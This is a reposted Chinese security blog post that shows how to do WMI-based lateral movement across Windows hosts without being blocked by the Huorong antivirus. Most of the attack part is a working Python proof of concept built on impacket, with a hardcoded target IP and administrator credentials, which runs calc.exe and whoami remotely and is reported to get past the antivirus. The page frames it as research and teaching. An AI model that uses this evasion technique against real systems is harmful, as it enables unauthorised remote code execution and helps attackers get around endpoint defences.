绕过杀软进行横向移动

admin 2024年10月7日19:26:35评论9 views字数 832阅读2分46秒阅读模式

查看拦截日志

wmi是基于135端口进行的横向。依赖445只是因为,需要使用445取回命令执行结果。sharpwmi进行横向的时候火绒日志有一个特别有趣的地方:

绕过杀软进行横向移动

这个是winmgmt的CLSID,假设sharpwmi调用这个dcom对象导致的被拦截?于是我马上自己用python写了一个wmiexec进行验证。调用calc验证我的想法,使用Process Hacker进行监控进程。

绕过杀软进行横向移动

编写poc绕过

from impacket.dcerpc.v5.dcomrt import DCOMConnection, COMVERSION
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL

dcom = DCOMConnection("192.168.111.180", "administrator", "123456")
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process, _ = iWbemServices.GetObject('Win32_Process')
win32Process.Create("c:\windows\system32\calc.exe","C:\",None)

运行代码,成功调用calc.exe。接下来,我们执行cmd命令。

绕过杀软进行横向移动

修改代码执行whoami火绒并未拦截

绕过杀软进行横向移动

原文始发于微信公众号(黑白天实验室):绕过杀软进行横向移动

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日19:26:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   绕过杀软进行横向移动https://cn-sec.com/archives/1985554.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息